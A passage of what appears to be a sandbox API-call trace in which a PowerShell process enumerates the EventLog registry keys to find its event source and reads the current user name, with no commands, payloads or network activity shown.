	[0529.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ba680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0529.840] CoTaskMemFree (pv=0x3ba680) 
	[0530.876] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d138 | out: phkResult=0x12d138*=0x2f8) returned 0x0
	[0530.880] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d0ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d0a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d0ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d0a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0530.880] CoTaskMemFree (pv=0x0) 
	[0530.881] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0530.881] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x0, lpName=0x34c760, lpcchName=0x12d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0530.881] CoTaskMemFree (pv=0x34c760) 
	[0530.881] CoTaskMemFree (pv=0x0) 
	[0530.881] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0530.881] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x1, lpName=0x34c760, lpcchName=0x12d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0530.881] CoTaskMemFree (pv=0x34c760) 
	[0530.881] CoTaskMemFree (pv=0x0) 
	[0530.881] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0530.881] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x2, lpName=0x34c760, lpcchName=0x12d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0530.881] CoTaskMemFree (pv=0x34c760) 
	[0530.881] CoTaskMemFree (pv=0x0) 
	[0530.881] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0530.882] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x3, lpName=0x34c760, lpcchName=0x12d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0530.882] CoTaskMemFree (pv=0x34c760) 
	[0530.882] CoTaskMemFree (pv=0x0) 
	[0530.882] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0530.882] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x4, lpName=0x34c760, lpcchName=0x12d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0530.882] CoTaskMemFree (pv=0x34c760) 
	[0530.882] CoTaskMemFree (pv=0x0) 
	[0530.882] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0530.882] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x5, lpName=0x34c760, lpcchName=0x12d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0530.882] CoTaskMemFree (pv=0x34c760) 
	[0530.882] CoTaskMemFree (pv=0x0) 
	[0530.882] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0530.882] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x6, lpName=0x34c760, lpcchName=0x12d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0530.882] CoTaskMemFree (pv=0x34c760) 
	[0530.882] CoTaskMemFree (pv=0x0) 
	[0530.882] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0530.882] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x7, lpName=0x34c760, lpcchName=0x12d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0530.882] CoTaskMemFree (pv=0x34c760) 
	[0530.882] CoTaskMemFree (pv=0x0) 
	[0530.882] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0530.882] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x8, lpName=0x34c760, lpcchName=0x12d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0530.882] CoTaskMemFree (pv=0x34c760) 
	[0530.882] CoTaskMemFree (pv=0x0) 
	[0530.882] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x2fc) returned 0x0
	[0530.882] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x0) returned 0x2
	[0530.883] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x300) returned 0x0
	[0530.883] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x0) returned 0x2
	[0530.883] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x310) returned 0x0
	[0530.883] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x0) returned 0x2
	[0530.883] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x328) returned 0x0
	[0530.883] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x0) returned 0x2
	[0530.883] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x32c) returned 0x0
	[0530.883] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x0) returned 0x2
	[0530.883] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x330) returned 0x0
	[0530.883] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x0) returned 0x2
	[0530.883] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x334) returned 0x0
	[0530.884] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x0) returned 0x2
	[0530.884] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x338) returned 0x0
	[0530.884] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x0) returned 0x2
	[0530.884] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x33c) returned 0x0
	[0530.884] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d198 | out: phkResult=0x12d198*=0x340) returned 0x0
	[0530.884] RegCloseKey (hKey=0x340) returned 0x0
	[0530.884] RegCloseKey (hKey=0x2f8) returned 0x0
	[0530.885] RegCloseKey (hKey=0x33c) returned 0x0
	[0530.896] CoTaskMemAlloc (cb=0x804) returned 0x1b7dd910
	[0530.896] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7dd910, nSize=0x12d3a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d3a8) returned 0x1
	[0530.897] CoTaskMemFree (pv=0x1b7dd910) 
	[0530.898] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0530.899] GetUserNameW (in: lpBuffer=0x34c760, pcbBuffer=0x12d3e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d3e8) returned 1
	[0530.899] CoTaskMemFree (pv=0x34c760) 
	[0531.860] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0e8 | out: phkResult=0x12d0e8*=0x344) returned 0x0
	[0531.860] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d05c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d058, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d05c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d058*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.860] CoTaskMemFree (pv=0x0) 
	[0531.860] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.860] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.860] CoTaskMemFree (pv=0x34c760) 
	[0531.860] CoTaskMemFree (pv=0x0) 
	[0531.860] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.861] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.861] CoTaskMemFree (pv=0x34c760) 
	[0531.861] CoTaskMemFree (pv=0x0) 
	[0531.861] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.861] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.861] CoTaskMemFree (pv=0x34c760) 
	[0531.861] CoTaskMemFree (pv=0x0) 
	[0531.861] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.861] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.861] CoTaskMemFree (pv=0x34c760) 
	[0531.861] CoTaskMemFree (pv=0x0) 
	[0531.861] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.861] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.861] CoTaskMemFree (pv=0x34c760) 
	[0531.861] CoTaskMemFree (pv=0x0) 
	[0531.862] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.862] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.862] CoTaskMemFree (pv=0x34c760) 
	[0531.862] CoTaskMemFree (pv=0x0) 
	[0531.862] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.862] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.862] CoTaskMemFree (pv=0x34c760) 
	[0531.862] CoTaskMemFree (pv=0x0) 
	[0531.862] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.862] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.862] CoTaskMemFree (pv=0x34c760) 
	[0531.862] CoTaskMemFree (pv=0x0) 
	[0531.862] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.862] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.862] CoTaskMemFree (pv=0x34c760) 
	[0531.863] CoTaskMemFree (pv=0x0) 
	[0531.863] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x348) returned 0x0
	[0531.863] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0531.863] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x34c) returned 0x0
	[0531.863] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0531.863] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x350) returned 0x0
	[0531.863] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0531.863] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x354) returned 0x0
	[0531.863] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0531.864] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x358) returned 0x0
	[0531.864] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0531.864] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x35c) returned 0x0
	[0531.864] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0531.864] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x360) returned 0x0
	[0531.864] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0531.864] RegOpenKeyExW (in: hKey=0x344, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x364) returned 0x0
	[0531.864] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0531.864] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x368) returned 0x0
	[0531.864] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x36c) returned 0x0
	[0531.865] RegCloseKey (hKey=0x36c) returned 0x0
	[0531.865] RegCloseKey (hKey=0x344) returned 0x0
	[0531.865] RegCloseKey (hKey=0x368) returned 0x0
	[0531.866] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0e8 | out: phkResult=0x12d0e8*=0x368) returned 0x0
	[0531.866] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d05c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d058, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d05c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d058*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.866] CoTaskMemFree (pv=0x0) 
	[0531.866] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.866] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x0, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.866] CoTaskMemFree (pv=0x34c760) 
	[0531.866] CoTaskMemFree (pv=0x0) 
	[0531.867] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.867] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x1, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.867] CoTaskMemFree (pv=0x34c760) 
	[0531.867] CoTaskMemFree (pv=0x0) 
	[0531.867] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.867] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x2, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.867] CoTaskMemFree (pv=0x34c760) 
	[0531.867] CoTaskMemFree (pv=0x0) 
	[0531.867] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.867] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x3, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.867] CoTaskMemFree (pv=0x34c760) 
	[0531.867] CoTaskMemFree (pv=0x0) 
	[0531.867] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.867] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x4, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.867] CoTaskMemFree (pv=0x34c760) 
	[0531.868] CoTaskMemFree (pv=0x0) 
	[0531.868] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.868] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x5, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.868] CoTaskMemFree (pv=0x34c760) 
	[0531.868] CoTaskMemFree (pv=0x0) 
	[0531.868] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.868] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x6, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.868] CoTaskMemFree (pv=0x34c760) 
	[0531.868] CoTaskMemFree (pv=0x0) 
	[0531.868] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.868] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x7, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.868] CoTaskMemFree (pv=0x34c760) 
	[0531.868] CoTaskMemFree (pv=0x0) 
	[0531.868] CoTaskMemAlloc (cb=0x204) returned 0x34c760
	[0531.868] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x8, lpName=0x34c760, lpcchName=0x12d0e8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d0e8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.868] CoTaskMemFree (pv=0x34c760) 
	[0531.868] CoTaskMemFree (pv=0x0) 
	[0531.868] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x344) returned 0x0
	[0531.868] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0531.869] RegOpenKeyExW (in: hKey=0x368, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x36c) returned 0x0
	[0531.869] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0531.869] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x370) returned 0x0
	[0531.869] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0531.869] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x374) returned 0x0
	[0531.869] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0532.713] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x378) returned 0x0
	[0532.713] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0532.713] RegOpenKeyExW (in: hKey=0x368, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x37c) returned 0x0
	[0532.713] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0532.714] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x380) returned 0x0
	[0532.714] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0532.714] RegOpenKeyExW (in: hKey=0x368, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x384) returned 0x0
	[0532.714] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x0) returned 0x2
	[0532.714] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x388) returned 0x0
	[0532.714] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d148 | out: phkResult=0x12d148*=0x38c) returned 0x0
	[0532.715] RegCloseKey (hKey=0x38c) returned 0x0
	[0532.715] RegCloseKey (hKey=0x368) returned 0x0
	[0532.715] RegCloseKey (hKey=0x388) returned 0x0
	[0532.716] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d0b8 | out: phkResult=0x12d0b8*=0x388) returned 0x0
